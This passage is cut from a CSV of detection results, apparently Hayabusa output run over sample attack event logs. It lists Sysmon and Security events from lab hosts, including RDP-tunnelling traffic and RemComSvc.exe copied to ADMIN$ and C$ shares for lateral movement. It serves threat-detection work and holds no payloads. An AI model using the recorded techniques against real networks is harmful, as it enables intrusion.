Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\vga.dll | Status: Valid | Hash: SHA1=00F4056FD5FE28EC255B4521EE18C700BCF9CEEB,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\vga.dll | Signature: Microsoft Windows,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.122 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.283 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:04:05.563 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\TSTheme.exe -Embedding | Process: C:\Windows\System32\TSTheme.exe | User: PC01\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x26656 | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.200 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 3780 | PGUID: 365ABB72-E014-5C67-0000-001023A71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.200 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2516 | PGUID: 365ABB72-E014-5C67-0000-001013A21500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.410 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3344 | PGUID: 365ABB72-E014-5C67-0000-00104AA11500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:06.971 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\TSTheme.exe | PID: 3712 | PGUID: 365ABB72-E015-5C67-0000-0010D0C61500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: fe80:0:0:0:647b:25b7:1cc4:b972:49478 (PC02) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:5355 (PC01.example.corp) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:61795 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:57255 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:137 (PC01.example.corp) | Dst: 10.0.2.18:137 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:22.794 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49184 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:25.488 +00:00,PC01.example.corp,6,medium,Evas,Driver Loaded_Unsigned,Path: C:\Windows\System32\VBoxDisp.dll | Status: Valid | Hash: SHA1=0D14114598EE4A3080B9F9083AE5A3339D429737,rules/hayabusa/sysmon/alerts/6_DriverLoaded_Unsigned.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:25.488 +00:00,PC01.example.corp,6,info,,Signed Driver Loaded,Path: C:\Windows\System32\VBoxDisp.dll | Signature: Oracle Corporation,rules/hayabusa/sysmon/events/6_DriverLoaded_Signed.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.499 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: PC01\IEUser | Parent Cmd: winlogon.exe | LID: 0x26656 | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.529 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\LogonUI.exe | PID: 2920 | PGUID: 365ABB72-E015-5C67-0000-00103FC01500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.529 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.539 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:26.539 +00:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:34.871 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:46.929 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:05:59.056 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:00.558 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:02.311 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:02.561 +00:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:03.062 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:03.062 +00:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 10:06:38.843 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 17:54:26.956 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:54:26.956 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:55:47.181 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:55:47.181 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:57:41.475 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 17:57:41.475 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-16 18:19:18.442 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 